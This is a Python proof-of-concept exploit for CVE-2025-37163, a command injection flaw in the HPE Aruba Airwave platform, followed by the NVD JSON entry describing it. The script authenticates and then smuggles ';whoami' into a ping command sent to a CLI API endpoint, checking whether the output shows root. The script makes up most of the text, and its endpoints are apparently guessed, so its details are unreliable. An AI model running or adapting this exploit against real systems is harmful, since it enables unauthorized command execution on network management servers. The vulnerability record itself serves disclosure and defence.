CVE-2025-37163

import requests import sys # CVE-2025-37163 PoC - HPE Aruba Airwave Command Injection # Usage: python poc.py <target_url> <username> <password> def exploit_airwave_cve(target_url, username, password): """ Exploit for CVE-2025-37163: Command Injection in HPE Aruba Airwave Platform CLI This PoC demonstrates how an authenticated attacker can execute arbitrary OS commands. """ session = requests.Session() # Step 1: Authentication login_url = f"{target_url}/api/login" login_data = { 'username': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) if response.status_code != 200: print("[-] Authentication failed") return False print("[+] Successfully authenticated") # Step 2: Command Injection via CLI # Inject malicious command through vulnerable parameter cli_url = f"{target_url}/api/cli" # Payload: Execute arbitrary command (e.g., whoami) malicious_command = ";whoami" payload = { 'command': f'ping {malicious_command}', 'execute': 'true' } response = session.post(cli_url, data=payload, timeout=10) if response.status_code == 200 and 'root' in response.text: print("[+] Command injection successful - Running as root!") print(f"[+] Response: {response.text}") return True else: print("[-] Command injection may have failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) exploit_airwave_cve(sys.argv[1], sys.argv[2], sys.argv[3])

{"cve": {"id": "CVE-2025-37163", "sourceIdentifier": "[email protected]", "published": "2025-11-18T19:15:48.290", "lastModified": "2025-12-03T13:34:55.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability has been identified in the command line interface of the HPE Aruba Networking Airwave Platform. An authenticated attacker could exploit this vulnerability to execute arbitrary operating system commands with elevated privileges on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.3.0.5", "matchCriteriaId": "0E151549-B1AC-4E19-9625-0F553BBA7A14"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04971en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}